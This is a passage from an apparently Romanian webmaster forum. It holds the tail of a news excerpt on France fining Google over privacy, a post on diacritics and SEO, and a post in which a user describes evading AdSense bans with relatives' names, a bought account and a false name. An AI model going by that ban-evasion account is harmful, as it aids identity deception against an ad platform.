that they simplify and standardize its approach across its various services. But critics argue that the policy, which offers no ability to opt out aside from refraining from signing into Google services, gives the operator of the world's largest search engine unprecedented ability to monitor its users' tastes and purchasing patterns. Source: France Fines Google Maximum Penalty in Data Privacy Row | SecurityWeek.Com
  23. Am avut pana acum 2 conturi adsense banate primul cont era pe numele tatului care la banat acum 2 sau 3 ani dupa care am facut alt cont pe germania cu site in germana la aprobat, am pus dupa tara romania adresa mea si am pus numele lu mama, facusem cei 70 de euro amarati si am reusit sa ii scot de sarbatori dupa o luna am schimbat numele am pus numele meu ca doar eu nu mai fusesem banat dupa cateva saptamani am fost banat pe motiv activitate invalida presupun ca niste prieteni care au dat clic intentionat. Acum recent am facut rost de la un baiat de un cont adsense cu 5 euro in el contul era vechi din 2007 dar nu era folosit, am facut niste baniti in el si am trimis pinul dar nu stiam ce nume sa pun asa ca am pus unu nume fals ex: (Popescu Marghioala) si acum astept sa vina pinu daca vine pinul pot sa schimb numele dupa dar ce nume pun ca numele lu tata a fost banat acum 2-3 si contul respectiv lam sters dar tot cred ca ma are in baza de date si am am o dilema cu contul am doilea care lam facut pe germania ma banat dupa ce am pus numele meu si numele lu mama oare acum o disponibil ca doar nu a banato pe mama ma banat pe mine oare zice gogole vreo ceva sper sa nu baneze si contul acesta ca da binepe clic
  24. Salutare prieteni, observ ca nu s-a mai discutat pe forum despre diacriticele pe un website. Si anume sa le folosim sau sa nu le folosim? Ne ajuta la SEO? Eu sunt de parere ca mai mult strica, din punct de vedere al motoarelor de cautare, dar pentru vizitatori sunt bune... Dar ce ne facem cu GOOGLE? Cel mai bun exemplu este un site facut de mine LGL - Firma de constructii case | la cheie | la rosu | din lemn , care inainte sa folosesc diacriticele in prima pagina, daca cautai pe google "firma de constructii" era al 3-lea, acum dupa ce am pus diacritice nici maicar nu il mai gasesc cu acele cuvinte!!! Voi ce parere aveti?
×
×
  • Create New...